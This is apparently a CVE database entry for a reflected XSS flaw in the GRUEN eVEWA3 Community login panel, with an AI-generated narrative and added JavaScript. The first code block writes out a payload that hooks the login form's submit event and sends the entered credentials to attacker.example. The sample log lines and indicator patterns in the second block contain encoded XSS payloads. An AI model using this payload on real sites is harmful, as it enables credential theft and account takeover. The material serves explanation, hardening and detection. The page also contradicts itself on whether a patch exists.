CVE-2023-25295
Description
Reflected XSS in GRUEN eVEWA3 Community login panel (versions 31-53) enables account takeover via crafted URL.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A reflected Cross-Site Scripting (XSS) vulnerability exists in the evewa3ajax.php endpoint of GRUEN eVEWA3 Community versions 31 through 53 [1]. The value of the file parameter is reflected into the login form HTML without output encoding, so arbitrary markup and JavaScript supplied in the request are returned to the victim's browser. No authentication is required to trigger the vulnerability.
Exploitation
An attacker crafts a URL whose file parameter carries the payload, for example a value beginning evewa3ajax.php%22%3E%3Cscript%3E...: the URL-encoded %22%3E decodes to `">`, which terminates the quoted attribute value and the tag into which the parameter is reflected, so the <script> element that follows is parsed as markup. When a victim opens the URL, the injected script runs in the origin of the login page. It can attach a JavaScript event handler such as onsubmit to the login form and send the credentials the victim enters to an attacker-controlled server [1]. The payload can be obfuscated using Base64 and URL encoding.
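The following JavaScript is an added illustration, not code from this page, from GRUEN, or from the cited reference. It models the reflection the description implies: a login-form template that places the request's file parameter into an HTML attribute verbatim, beside a version that escapes it before insertion, and builds the crafted URL from a decoded payload so the reader can see the %22%3E%3Cscript%3E prefix arise from encoding. The template, the attribute being reflected into (a form action), the attacker host attacker.example and the site host evewa.example are assumptions; the page only states that the value is reflected into the login form HTML.

```javascript
// Added example: models an unescaped reflection of the `file` parameter into
// a login-form attribute. The template and hosts are assumptions, not eVEWA3's
// real code. The payload attaches an onsubmit handler that posts the form
// fields to an attacker-controlled host, as the CVE narrative describes.
const PAYLOAD =
  'evewa3ajax.php"><script>' +
  'document.forms[0].onsubmit=()=>fetch("https://attacker.example/?"+' +
  'new URLSearchParams(new FormData(document.forms[0])))</script>';

// The URL the victim is lured to: the decoded payload, percent-encoded.
function craftedUrl(base = "https://evewa.example/evewa3ajax.php") {
  return base + "?file=" + encodeURIComponent(PAYLOAD);
}

// Simulates the server parsing the query string (percent-decoding included).
function fileParamFromUrl(url) {
  return new URL(url).searchParams.get("file");
}

// Vulnerable renderer: the parameter value lands inside action="..." verbatim,
// so a value containing `">` closes the attribute and the <form> tag.
function renderLoginVulnerable(fileParam) {
  return '<form method="post" action="' + fileParam + '">' +
         '<input name="user"><input name="pass" type="password">' +
         '<button>Login</button></form>';
}

// Hardened renderer: escape the HTML-significant characters before inserting
// into a quoted attribute. `"` becomes &quot; so the attribute cannot be closed.
function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderLoginHardened(fileParam) {
  return '<form method="post" action="' + escapeHtmlAttr(fileParam) + '">' +
         '<input name="user"><input name="pass" type="password">' +
         '<button>Login</button></form>';
}

// Crude check used for the demonstration: does the output contain a real
// <script ...> start tag (as opposed to the escaped text &lt;script&gt;)?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Walk the full chain: crafted URL -> parsed parameter -> rendered page.
function demo() {
  const url = craftedUrl();
  const value = fileParamFromUrl(url);
  return {
    urlPrefixMatchesAdvisory: url.includes("file=evewa3ajax.php%22%3E%3Cscript%3E"),
    vulnerableRendersScript: containsScriptTag(renderLoginVulnerable(value)),
    hardenedRendersScript: containsScriptTag(renderLoginHardened(value)),
  };
}
```

Running demo() shows the same parameter value producing an executable <script> element in the vulnerable template and only inert &quot;&gt;&lt;script&gt; text in the hardened one; the fix is contextual output encoding at the point of reflection, not filtering of the input.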
Impact
Successful exploitation allows the attacker to steal login credentials of any user who visits the crafted URL and submits the login form. This leads to account takeover (ATO) and escalation of privileges, as the attacker can then access the victim's account with the same level of access [1].
Mitigation
A security patch labeled "H1" has been applied across all affected versions (31 to 53) to fix the XSS vulnerability [1]. Users should ensure they are running the patched version. No workarounds are documented.
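Because no workaround is documented, a practitioner who cannot patch immediately will want to know whether the login endpoint is being probed. The following JavaScript is an added example, not from this page or from GRUEN: it scans web-server access-log lines for requests to evewa3ajax.php whose query string, after repeated URL-decoding and expansion of Base64 passed to atob(), contains script or event-handler injection. The Apache combined log format, the field layout, the sample lines (constructed here, not real traffic) and the indicator patterns are all assumptions; the page only says that payloads may be URL- and Base64-encoded, which is why decoding happens before matching.

```javascript
// Added example: detection of exploitation attempts in access logs.
// Assumes Apache combined log format; the sample lines below are constructed.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Mar/2023:10:01:02 +0000] "GET /evewa3ajax.php?file=login HTTP/1.1" 200 1234',
  // Single URL-encoded payload, as in the advisory prefix.
  '203.0.113.9 - - [10/Mar/2023:10:01:03 +0000] "GET /evewa3ajax.php?file=evewa3ajax.php%22%3E%3Cscript%3Edocument.forms%5B0%5D.onsubmit%3Dfetch(%27https%3A%2F%2Fattacker.example%27)%3C%2Fscript%3E HTTP/1.1" 200 1300',
  // Double URL-encoded, script body hidden in Base64 (b25zdWJtaXQ9MQ== is "onsubmit=1").
  '198.51.100.7 - - [10/Mar/2023:10:02:11 +0000] "GET /evewa3ajax.php?file=evewa3ajax.php%2522%253E%253Cscript%253Eeval(atob(%2527b25zdWJtaXQ9MQ%253D%253D%2527))%253C%252Fscript%253E HTTP/1.1" 200 1300',
  // Injection attempt against a different path: out of scope for this rule.
  '198.51.100.8 - - [10/Mar/2023:10:03:00 +0000] "GET /index.php?q=%3Cscript%3E HTTP/1.1" 404 0',
];

// Parse one combined-format line into its parts; returns null on no match.
function parseAccessLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})/.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status] = m;
  const q = target.indexOf("?");
  return {
    ip, ts, method,
    path: q < 0 ? target : target.slice(0, q),
    query: q < 0 ? "" : target.slice(q + 1),
    status: Number(status),
  };
}

// Percent-decode until the string stops changing (bounded), so double- and
// triple-encoded payloads are normalised. Malformed sequences stop the loop.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, " ");
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Append the decoded argument of every atob('...') call, so a script body
// hidden in Base64 is still visible to the indicator patterns.
function expandBase64(s) {
  const extras = [];
  for (const m of s.matchAll(/atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g)) {
    extras.push(Buffer.from(m[1], "base64").toString("utf8"));
  }
  return extras.length ? s + "\n" + extras.join("\n") : s;
}

// Indicators chosen for this CVE: script tags, form/event handlers, and the
// usual decode-and-execute wrappers. Tune the handler list for your traffic.
const INJECTION =
  /<\/?script\b|\bon(?:submit|load|error|click|focus|mouseover)\s*=|javascript:|\beval\s*\(|\batob\s*\(/i;

// Return one hit per request to evewa3ajax.php whose decoded query matches.
function detectXssAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const r = parseAccessLine(line);
    if (!r || !/^\/evewa3ajax\.php$/i.test(r.path)) continue;
    const decoded = expandBase64(fullyDecode(r.query));
    const m = INJECTION.exec(decoded);
    if (m) hits.push({ ip: r.ip, ts: r.ts, status: r.status, indicator: m[0], decoded });
  }
  return hits;
}
```

Matching on the decoded query rather than the raw one is the important design choice: a rule that looks for the literal %3Cscript%3E misses the double-encoded request, and one that looks for <script> misses the Base64-wrapped body. A 200 response to a flagged request only tells you the payload was reflected, not that a victim actually submitted credentials, so hits are a trigger for investigation (referrer, victim IPs, subsequent logins), not proof of compromise.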
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- GRUEN/eVEWA3 Community
- Range: 31-53
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.